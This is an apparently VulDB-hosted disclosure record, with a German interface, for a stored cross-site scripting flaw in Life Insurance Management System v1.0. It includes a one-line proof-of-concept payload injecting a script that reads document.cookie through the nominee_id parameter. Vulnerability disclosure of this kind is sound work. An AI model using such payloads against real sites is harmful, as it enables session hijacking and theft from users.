Submit #166190: Life Insurance Management System v1.0 /lims/insertNominee.php POST parameter nominee_id exists stored cross-site scripting vulnerabilityinfo

TitelLife Insurance Management System v1.0 /lims/insertNominee.php POST parameter nominee_id exists stored cross-site scripting vulnerability
BeschreibungLife Insurance Management System v1.0 has stored cross-site scripting. Vulnerability File: /lims/insertNominee.php POST parameter nominee_id exists stored cross-site scripting vulnerability. Payload: nominee_id=<script>alert(document.cookie)</script>&client_id=2&name=3&sex=4&birth_date=5&nid=6&relationship=7&priority=8&phone=9 Payload will trigger when a user visits on http://localhost/lims/nominee.php.
Quelle⚠️ https://github.com/Hanwengao/CVERequests/blob/main/XSS.md
Benutzer
 wengao (UID 48331)
Einreichung08.06.2023 04:41 (vor 3 Jahren)
Moderieren08.06.2023 18:47 (14 hours later)
StatusAkzeptiert
VulDB Eintrag231109 [SourceCodester Life Insurance Management System 1.0 POST Parameter insertNominee.php nominee_id Cross Site Scripting]
Punkte20

ZurückÜbersichtWeiter

Do you know our Splunk app?

Download it now for free!